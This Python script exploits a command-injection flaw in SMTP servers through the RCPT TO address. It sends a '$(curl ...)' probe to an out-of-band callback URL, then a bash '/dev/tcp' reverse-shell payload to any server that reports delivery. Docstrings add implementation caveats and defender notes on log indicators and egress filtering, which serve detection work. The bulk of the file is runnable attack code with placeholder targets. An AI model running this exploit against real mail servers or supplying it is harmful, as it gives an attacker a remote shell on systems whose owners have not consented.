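import socket


def is_port_open(host, port):
    """Return True if a TCP connection to (host, port) succeeds within 10 s, else False.

    The probe connection is closed as soon as it is established and nothing is
    sent on it. Every socket-level failure the original listed (socket.timeout,
    ConnectionRefusedError, OSError) is an OSError subclass, so one handler
    covers them all, including name-resolution errors.
    """
    try:
        with socket.create_connection((host, port), timeout=10):
            pass
    except OSError:
        return False
    return True


def smtp_payload_check_vulnerability(host, port, oast):
    """Run one SMTP transaction whose RCPT TO local-part carries a ``$(curl ...)``
    substitution and return the server's reply to the end-of-DATA marker.

    Args:
        host, port: SMTP server to connect to (10 s connect/read timeout).
        oast: callback URL embedded in the substitution; the probe's premise is
            that a vulnerable server evaluates the address and contacts this URL
            (not verified here — the caller only inspects the SMTP reply text).

    Returns:
        The UTF-8 decoded reply received after ``.<CRLF>``, or ``"Error: <exc>"``
        for any failure (connect timeout, reset, undecodable bytes). Callers get a
        plain string either way and must look at the prefix to tell them apart.

    Caveats grounded in the code below: each ``recv(1024)`` takes at most one
    chunk, so a multi-line EHLO greeting can leave data buffered and a later
    read may return an earlier line rather than the reply it is paired with.
    ``send`` may also transmit fewer bytes than requested; the result is ignored.
    The reply to QUIT is never read; the context manager closes the socket.

    Defender notes: the on-the-wire indicator is an envelope recipient whose
    quoted local-part contains ``$(`` / ``${IFS}``; the second indicator is
    outbound HTTP from the mail host to an unknown destination. Inspecting MTA
    logs for shell metacharacters in RCPT TO and denying egress from mail
    servers to untrusted hosts cover both halves.
    """
    try:
        with socket.create_connection((host, port), timeout=10) as conn:
            conn.send(b'EHLO localhost\r\n')
            conn.recv(1024)
            # Empty reverse-path: no sender address is supplied at all.
            conn.send(b'MAIL FROM: \r\n')
            conn.recv(1024)
            # ``${{IFS}}`` in the f-string renders as the literal ``${IFS}``.
            rcpt_to_payload = f'RCPT TO: <"aabbb$(curl${{IFS}}{oast})"@mail.domain.com>\r\n'.encode()
            conn.send(rcpt_to_payload)
            conn.recv(1024)
            conn.send(b'DATA\r\n')
            conn.recv(1024)
            conn.send(b'aaa\r\n.\r\n')
            # This is the only reply the caller ever sees.
            resp = conn.recv(1024)
            conn.send(b'QUIT\r\n')
            return resp.decode('utf-8')
    except Exception as e:
        # Broad on purpose in the original: any failure is folded into the
        # returned string rather than raised.
        return f"Error: {str(e)}"


def smtp_payload_exploit_reverse_shell(host, port, local_ip, local_port):
    """Run the same SMTP transaction as the probe, but with a local-part that
    wraps an interactive bash reverse-shell command in ``bash -c '...'``.

    Args:
        host, port: SMTP server to connect to (10 s timeout).
        local_ip, local_port: endpoint the ``/dev/tcp`` redirection points at.

    Returns:
        The decoded reply to ``.<CRLF>``, or ``"Error: <exc>"`` on any failure,
        exactly as in ``smtp_payload_check_vulnerability``. A reply string says
        nothing about whether a shell actually connected back; this function
        never listens on ``local_port``.

    The same one-chunk ``recv`` and unchecked ``send`` caveats as the probe
    apply. Defender notes: the indicators are a RCPT TO local-part containing
    ``bash -c`` / ``/dev/tcp``, and an outbound TCP connection from the mail
    host with an interactive ``bash`` child of the MTA process; egress
    filtering from mail servers and alerting on shells spawned by the MTA user
    are the corresponding controls.
    """
    reverse_shell = f'/bin/bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1'
    try:
        with socket.create_connection((host, port), timeout=10) as conn:
            conn.send(b'EHLO localhost\r\n')
            conn.recv(1024)
            conn.send(b'MAIL FROM: \r\n')
            conn.recv(1024)
            rcpt_to_payload = f'RCPT TO: <"exploit$(bash -c \'{reverse_shell}\')"@mail.domain.com>\r\n'.encode()
            conn.send(rcpt_to_payload)
            conn.recv(1024)
            conn.send(b'DATA\r\n')
            conn.recv(1024)
            conn.send(b'Exploit in action\r\n.\r\n')
            resp = conn.recv(1024)
            conn.send(b'QUIT\r\n')
            return resp.decode('utf-8')
    except Exception as e:
        return f"Error: {str(e)}"


def main():
    """Entry point: reachability check, OAST probe, then the reverse-shell step.

    The target and callback values below are literal placeholders. The exploit
    step is gated only on the substring "message delivered" appearing in the
    probe's reply; that check is also applied to the ``"Error: ..."`` strings
    the helpers return on failure, so a failed probe simply prints the
    "No vulnerability detected" branch.
    """
    host = "target.domain.com"
    port = 25
    oast = "http://your-oast-url.com"
    local_ip = "your-local-ip"
    local_port = 4444

    # Guard clause instead of a trailing else: same output, flatter body.
    if not is_port_open(host, port):
        print(f"Port {port} is closed on {host}")
        return

    print(f"Port {port} is open on {host}")
    print("Checking for vulnerability...")
    response = smtp_payload_check_vulnerability(host, port, oast)
    print("SMTP Response (Vulnerability Check):\n", response)
    if "message delivered" in response:
        # The source had this literal split across a physical line break,
        # which is a syntax error; the two halves are joined with a space.
        print("Vulnerability detected! Proceeding to exploitation...")
        exploit_response = smtp_payload_exploit_reverse_shell(host, port, local_ip, local_port)
        print("SMTP Response (Exploitation - Reverse Shell):\n", exploit_response)
    else:
        print("No vulnerability detected or unable to exploit.")


if __name__ == "__main__":
    main()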